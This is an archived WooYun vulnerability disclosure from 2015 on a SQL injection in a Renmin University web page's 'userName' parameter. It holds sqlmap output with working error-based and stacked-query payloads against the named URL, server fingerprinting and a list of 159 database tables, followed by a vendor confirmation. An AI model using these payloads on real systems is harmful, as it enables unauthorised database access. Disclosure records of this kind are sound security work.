乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111涉及17个库:
sqlmap resumed the following injection point(s) from stored session:---Parameter: userName (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111' AND 5013=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5013=5013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'ckja'='ckja Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111';WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: eemd[159 tables]+--------------------------------+| ask_Ad || ask_Announcement || ask_Answers || ask_Catalog || ask_Configuration || ask_CreditRule || ask_CreditRuleLog || ask_Expert || ask_Links || ask_Question || ask_UserGroup || ask_Users || ask_Votes || b2c_Ad || b2c_Advertisement || b2c_Brand || b2c_Category || b2c_CategoryGroup || b2c_Configuration || b2c_ContentGroup || b2c_ContentModel || b2c_GoodsLink || b2c_GoodsPhoto || b2c_GoodsType || b2c_Log || b2c_RelatedField || b2c_RelatedFieldItem || b2c_Shop || b2c_Star || b2c_StarSetting || b2c_StlTag || b2c_Supplier || b2c_SystemPermissions || b2c_Tag || b2c_TagStyle || b2c_Template || b2c_TemplateMatch || b2c_UserGroup || b2c_Users || bairong_Administrator || bairong_AdministratorsInRoles || bairong_Cache || bairong_Card || bairong_CardType || bairong_Config || bairong_ContentModel || bairong_Count || bairong_Digg || bairong_IP2City || bairong_Log || bairong_Module || bairong_PayRecord || bairong_Payment || bairong_PermissionsInRoles || bairong_Roles || bairong_SSOApp || bairong_TableCollection || bairong_TableMatch || bairong_TableMetadata || bairong_TableStyle || bairong_TableStyleItem || bairong_Tags || bairong_UserAddCard || bairong_UserBinding || bairong_UserConfig || bairong_UserConsume || bairong_UserCreditsLog || bairong_UserMessage || bairong_UserType || bairong_Users || bairong_Vote || bairong_VoteIPAddress || bairong_VoteItem || bbs_Ad || bbs_Announcement || bbs_Attachment || bbs_AttachmentType || bbs_Configuration || bbs_CreditRule || bbs_CreditRuleLog || bbs_Face || bbs_Forum || bbs_Icon || bbs_Identify || bbs_KeywordsCategory || bbs_KeywordsFilter || bbs_Link || bbs_Navigation || bbs_Online || bbs_Permissions || bbs_Poll || bbs_PollItem || bbs_PollUser || bbs_Post || bbs_Report || bbs_Thread || bbs_ThreadCategory || bbs_UserGroup || bbs_Users || liveserver_Activity || liveserver_BlogCategory || liveserver_BlogContent || liveserver_Comment || liveserver_Configuration || liveserver_Favorite || liveserver_Friends || liveserver_Message || liveserver_MyWeb || liveserver_PhotoContent || liveserver_PhotoContentsInSets || liveserver_PhotoSet || liveserver_Rss || liveserver_Tag || liveserver_UserContent || liveserver_Users || liveserver_Visitors || liveserver_Word || siteserver_Ad || siteserver_Advertisement || siteserver_Comment || siteserver_Configuration || siteserver_Content || siteserver_ContentGroup || siteserver_GatherDatabaseRule || siteserver_GatherFileRule || siteserver_GatherRule || siteserver_InnerLink || siteserver_Input || siteserver_InputContent || siteserver_JobContent || siteserver_Log || siteserver_Machine || siteserver_MailSendLog || siteserver_MailSubscribe || siteserver_MenuDisplay || siteserver_Node || siteserver_NodeGroup || siteserver_PagePermissions || siteserver_PhotoContent || siteserver_PublishmentSystem || siteserver_RelatedField || siteserver_RelatedFieldItem || siteserver_ResumeContent || siteserver_SeoMeta || siteserver_SeoMetasInNodes || siteserver_Star || siteserver_StarSetting || siteserver_StlTag || siteserver_SystemPermissions || siteserver_TagStyle || siteserver_Task || siteserver_TaskLog || siteserver_Template || siteserver_TemplateMatch || siteserver_TemplateRule || siteserver_Tracking || siteserver_UserContent || siteserver_UserGroup || siteserver_Users |+--------------------------------+
危害等级:中
漏洞Rank:6
确认时间:2015-12-01 09:12
确认,已通知相关人员进行处理
暂无